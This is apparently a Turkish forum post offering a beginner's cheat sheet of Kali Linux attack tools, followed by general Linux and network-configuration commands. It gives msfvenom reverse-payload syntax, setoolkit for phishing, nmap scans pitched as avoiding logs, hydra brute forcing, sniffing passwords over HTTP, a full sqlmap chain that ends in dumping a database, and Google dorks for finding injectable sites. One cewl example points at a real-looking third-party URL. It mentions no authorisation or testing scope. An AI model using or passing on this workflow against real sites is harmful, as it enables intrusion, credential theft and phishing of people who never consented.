Aynen kardeşim tek işim Linux'ta heçkırlık yapmak.
Denemek istiyorum Linux Mint, Pardus ve Kali Linux arasında kaldım.
Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.
Kali Linux
METASPLOİT-FRAMEWORK İLE PENETRASYON TESTİ:
msfconsole >>> metasploit çalıştırır
show (payloads-exploits) >>> Payload veya Exploitleri görüntüler
msfvenom -p (payload adı) LHOST=(ip adresiniz) LPORT=(HERHANGİ BİR 4 HANELİ SAYI GİRİN) -f (format) > (dosyaadi).(format)
search (kelime) >>> aramak istediğiniz kelimeyi girin
use (exploit-payload adı)>>> exploit veya payloada girer
show options >>> ayarları görüntüler
run >>> tarama yapar
Bağlantı Kurulduğunda Meterpreter Konsolu Açılır
help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz
Maltego İle Sorgu;
maltego >>> maltegoyu çalıştırır
SOSYAL MÜHENDİSLİK
setoolkit >>> sosyal mühendislik kitini çalıştırır
Phishing v.b yapabilirsiniz.
SİTE ZAAFİYET TARAMASI:
1-)Fierce İle Keşif Yapma;
fierce -h >>> yardım almak için kullanılır
fierce --domain (sitealanadi) >>> site ip keşfi yapmak için kullanılır
2-)Wapiti İle Tarama;
wapiti -u (sitelinki) >>> Xss Veya Sql açığı bulursa bildirecektir.
3-)OwaspZap;
zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.
4-)Dirb İle Admin Panel Bulma;
dirb (sitelinki) >>> Admin Panel Bulmak İçin Kullanılır Genelde
5-)Nmap İle Site Zaafiyet Taraması Yapma;
İlk önce site ip adresini buluyoruz.Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve ip adresini kopyalıyoruz.Ardından
nmap (sitelinki) >>> genel tarama yapar
nmap -sS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar
nmap -O -sS (sitelinki) >>> log kayıtlarına takılmadan,OS sistemini öğrenerek tarama yapar
nmap -O -A -sS (sitelinki) >>> log kayıtlarına takılmadan,OS sistemini öğrenerek,işletim sistemini öğrenmeye çalışarak tarama yapar
nmap -O -A -sS -iL (dosya).txt >>> log kayıtlarına takılmadan,OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak,çoklu ip taraması yapar
6-) Whois İle Site Bilgilerini Öğrenme;
whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar
WORDLİST OLUŞTURMA
1-)Normal Wordlist Oluşturma;
crunch (min hane) (max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt
Örnek;
crunch 8 8 1234567890abcdefg -o liste.txt
2-)Sözlük (Site) Wordlisti Oluşturma;
cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)
Örnek;
cewl -d 3 -m 8
http://www.alphaonenow.org/info.php?id=131 -w liste
3-) Kişiye Yönelik Wordlist Oluşturma;
İlk önce cupp aracını indiriyoruz
apt install cupp
Ardından
cupp -i
Sonra gereken bilgileri veriyoruz ve wordlist hazır
BRUTEFORCE SALDIRISI YAPMA
1-)Hydra İle Ssl Destekli Sitelere Saldırma;
hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz
(Başka Araçlarda Var Githubta mevcut)
AĞ İZLEME
1-) WireShark İle Ağ İzleme;
wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer http ise follow/TCP Stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(Detaylı Adli Bilişim Aracıdır Vaktinizi Alabilir)
2-)Kismet İle Ağınızda Kim Var Kim Yok Kontrol Edin;
kismet -c (ağ geçidinizi yazın örnek:wlan0,eth0) >>> bir link verecektir tarayıcınızda açın linux kullanıcı adınızı şifrenizi girin (root geçerlidir)
3-) Ettercap İle Ağ İzleme :
ettercap -g >>> ettercapı başlatır
SİTE SÖMÜRGECİLİK
1-)SQLMap İle Site Sömürgesi;
sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır
sqlmap -u (sitelinki) -D (database adı) --tables
>>> sitenin tablolarını araştırır
sqlmap -u (sitelinki) -D (database adı) -T (tablo adı) --columns >>> sitenin columnlarını araştırır
sqlmap -u (sitelinki) -D (database adı) -T (tablo adı) -C (column adı) --dump >>> size içeriği veya sonucu gösterir
Bu sadece SQL açıklı sitelerde geçerlidir.
Sql açıklı site nasıl bulunur???
Googlede dork aratarak bulabilirsiniz
Dorkları kendiniz yapsanız daha etkili sonuç alırsınız
Hazır Dorklar;
inurl:staff_id=
inurl
hp?_id=
inurl:none_id=
inurl:me_id=
inurl:login?_id=
Sitede SQL açığı olduğunu nasıl anlarız???
Site linkinin sonuna (') işaretini koyarız eğer varsa ;
mysql_ ifadesi geçen bir hata alırız
BİLGİSAYARINIZI BİR WEB SUNUCUSU YAPIN!
service apache2 start-stop-restart >>> apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat
Bilgisayarınızın İP adresi sunucunuzun adresidir.İP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.
/var/www/html >>> buraya html dosyanızı atın ve tarayıcıya
ip adresiniz/(dosyanizin adi).html olarak aratın.Siteniz karşınıza gelecektir.
Örnek;
192.168.0.1/login.html
KALİ LİNUX GENEL KOMUTLAR:
shutdown -h (şimdi-now,saat-{örn. 21:00})>>>
Bilgisayarı kapatır
shutdown -r (şimdi-now,saat-{örn. 20:00})>>> bilgisayarı yeniden başlatır
ls >> dizin içeriğini görüntüler
cd (klasör) >> klasöre girer
cd .. >> klasörden çıkar
sudo >>> root değilken root işlem yapmayı sağlar
passwd (kullanıcı adı) >>> şifre değiştirir
apt-get update >> kali linux paketlerini yükseltir
apt-get upgrade >> kali linux paketlerini günceller
apt install (paketadı) >> paket yükler
apt-get install --reinstall (paket adı) >>> paketi baştan kurar
chmod +x (dosyaadi) >> dosyaya izin verir
chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.
chown -R root (dosyaismi) >> root yetkisi verir
cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar
mv (dosyaadi) (tasinacak dizin) >> dosya taşır
zip (dosyaadi) >> dosyayı arşivler
unzip (dosyaadi) >> dosyayı arşivden çıkarır
openvpn (dosyaismi) >>> vpn açar
KALİ LİNUX İP DEĞİŞTİRME
ifconfig yazın >>> ip adresiniz hakkında bilgilerinizi görüntüler
Yeni Terminal Açıp;
cd /etc/network/ >>> dizinine giriyoruz
nano interfaces >>> dosyayı düzenleyeceğiz
&(En Alt Satıra İnin)&
iface (ağ geçidiniz) inet static
(TabBasın)address (istediğiniz ip adresi yazın)
(TabBasın)netmask (ilk terminalde yazanı yaz)
(TabBasın)broadcast (ilk terminalde yazanı yaz)
(TabBasın)gateway (modem arayüz ipnizi yazın)
Ctrl+X basın Sonra (Y) Basın ve Enterlayın
Reboot yazın >>> sistemi yeniden başlatır
ifup (ağ geçidiniz örnek:wlan0,eth0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)
Not: eth0 da çalışacaktır wlan0da çalıştıramadım ama deneyin.
WEBSPLOİT
apt install websploit >>> websploit aracını kurar
websploit >>> websploit aracını çalıştırır
show modules >>> tüm modülleri gösterir
use (modül adı) >>> modüle girer
options >>> ayarları görüntüler
help >>> yardım almak için kullanılır
set (ayar) >>> ayarları düzenler
execute >>> başlatır
TERMİNETER KULLANIMI
apt install termineter >>> termineteri yükler
termineter >>> termineteri başlatır
show modules >>> modülleri görüntüler
use (modül) >>> modüle girer
show options >>> ayarları görüntüler
set (ayar) >>> ayar değiştirir
help >>> yardım almak için kullanılır
run >>> modülü başlatır
Lynis İle Sistem Güvenlik Taraması
git clone (indirme linki)>>> Lynis aracını github deposundan indiriyoruz
./lynis audit system >>> tarama başlatır
WPScan ile WordPress Site Taraması;
wpscan --url (sitelinki.com)